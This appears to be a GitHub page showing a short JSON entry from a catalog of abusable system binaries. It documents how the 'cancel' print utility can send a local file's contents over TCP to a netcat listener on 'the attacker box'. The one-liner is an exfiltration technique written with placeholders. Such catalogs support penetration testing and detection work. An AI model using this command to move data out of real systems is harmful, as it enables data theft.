You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

10 lines
270 B
JSON

{
"functions": {
"file-upload": [
{
"description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
"code": "cancel -u \"$(cat [file])\" -h [host]:[port]\n"
}
]
}
}